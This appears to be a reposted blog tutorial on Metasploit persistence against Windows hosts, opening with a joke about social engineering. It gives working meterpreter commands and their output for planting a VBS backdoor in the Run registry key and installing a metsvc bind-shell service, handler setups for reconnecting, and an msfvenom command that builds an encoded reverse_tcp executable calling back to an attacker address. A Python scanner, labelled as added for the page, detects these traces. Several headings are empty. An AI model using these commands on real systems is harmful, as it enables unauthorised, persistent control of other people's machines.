To make you my girlfriend, I am seriously studying social engineering...

Generating shellcode:

Persistent control:

1. Meterpreter built-in scripts

Method 1. run persistence

Use run persistence -h to list the available options:

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443
[*] Persistent agent script is 609496 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[+] Agent executed with PID 3272
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY

As the output shows, the autostart is added by writing a value under the registry Run key, and what that value launches is the VBS script backdoor.

Connecting back:

msf > use exploit/multi/handler
msf  exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf  exploit(handler) > set LHOST 192.168.1.139
LHOST => 192.168.1.139
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...

Nothing connects at first; once the target machine has rebooted, a meterpreter shell is obtained successfully.

Method 2. run metsvc

Run the metsvc script:

meterpreter > run metsvc -A
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\kqaqtcsWhBTbO...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.
[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...

A new service is created and set to start automatically (image name metsvc.exe, service name metsvc). Connect to the backdoor:

msf > use exploit/multi/handler
msf  exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf  exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
meterpreter >

Connected successfully.


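Both methods above leave tell-tale traces on the host: a Run key value pointing at a .vbs script under C:\WINDOWS\TEMP, and a freshly installed auto-start service whose binary also lives under TEMP. The following scanner is an added example written for this page, not code from the original post or from Metasploit; the REG_SET/SVC_INSTALL line format and the sample entries are constructed assumptions standing in for real registry and service-install telemetry.

```python
import re
from typing import Dict, List

# Constructed sample telemetry (not real logs), modelled on the traces the two
# methods leave: a Run value from persistence.rb and a metsvc service install.
SAMPLE_EVENTS = [
    r'REG_SET key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run name=FCBCUBtLrzFY data=C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs',
    r'REG_SET key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run name=OneDrive data="C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    r'SVC_INSTALL name=metsvc image=C:\WINDOWS\TEMP\kqaqtcsWhBTbO\metsvc.exe start=auto',
    r'SVC_INSTALL name=Spooler image=C:\WINDOWS\System32\spoolsv.exe start=auto',
]

TEMP_DIR = re.compile(r'\\(?:windows\\)?temp\\', re.I)        # any ...\TEMP\... path
SCRIPT_EXT = re.compile(r'\.(vbs|js|wsf|bat|cmd|ps1|hta)\b', re.I)
RUN_KEY = re.compile(r'\\CurrentVersion\\Run(Once)?$', re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Split 'TYPE k=v k="v v"' into a dict; the event type is stored under 'type'."""
    kind, _, rest = line.partition(' ')
    fields = {'type': kind}
    for key, val in re.findall(r'(\w+)=("[^"]*"|\S+)', rest):
        fields[key] = val.strip('"')
    return fields


def assess(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules the event trips (empty list = nothing suspicious)."""
    hits: List[str] = []
    if event['type'] == 'REG_SET' and RUN_KEY.search(event.get('key', '')):
        data = event.get('data', '')
        if SCRIPT_EXT.search(data):
            hits.append('run-key-launches-script')   # autorun of a .vbs/.js/... file
        if TEMP_DIR.search(data):
            hits.append('run-key-target-in-temp')    # autorun target lives under TEMP
    if event['type'] == 'SVC_INSTALL' and TEMP_DIR.search(event.get('image', '')):
        hits.append('service-image-in-temp')         # service binary lives under TEMP
    return hits


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious line to its rule hits; benign lines are left out."""
    findings: Dict[str, List[str]] = {}
    for line in lines:
        hits = assess(parse_event(line))
        if hits:
            findings[line] = hits
    return findings


if __name__ == '__main__':
    for line, hits in scan(SAMPLE_EVENTS).items():
        print(', '.join(hits), '<-', line)
```

Against the constructed sample the two Metasploit artefacts are flagged and the two legitimate entries (a vendor updater in AppData, a system service in System32) pass clean.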
Native:

msfvenom -p windows/meterpreter/reverse_tcp --arch x86 --platform Windows -e x86/shikata_ga_nai -b '\x00' -i 5  LHOST=192.168.1.101 LPORT=4444 -f exe > abc.exe

Parasitic:

Reposted from: https://my.oschina.net/duanpeng/blog/488450
